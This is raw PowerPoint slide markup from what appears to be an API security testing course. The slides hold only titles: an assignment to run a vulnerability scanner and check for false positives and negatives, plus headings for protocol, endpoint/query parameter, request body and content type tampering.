            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quick Assignment#1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use a scanner tool to find web or API vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After the vulnerabilities are discovered, check if they are false positives or false negatives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40745335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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2F156174-0DDD-4C14-AD53-B0B4B7280E7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1852612" y="147637"/>
            <a:ext cx="8124825" cy="4905375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69801757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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>False Positives &amp; False Negatives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Discuss on </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>False Positive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>False Negative</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>True Positive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>True Negative</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395690104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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find RESTful API vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Protocol tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="126370842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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find API vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>End Point/Query Param sniffing/smuggling/tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301143582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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find API vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Request Body tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="97734538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xmlns="" id="{FBDCECDC-EEE3-4128-AA5E-82A8C08796E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507"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xmlns="" id="{4260EDE0-989C-4E16-AF94-F652294D828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white">
          <a:xfrm>
            <a:off x="1507" y="495300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Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1C092485-3A6D-4168-BB4C-7E38CC53C09E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249680" y="911352"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2269D7D6-BF3B-4994-92A6-EC10FAE782E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="243904"/>
            <a:ext cx="10058400" cy="423544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Find API vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{74F987EC-2C27-4B1E-8745-FCD1FCA79028}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066783" y="864140"/>
            <a:ext cx="10058400" cy="389216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8000" i="0" kern="1200" spc="-50" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content Type tampering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
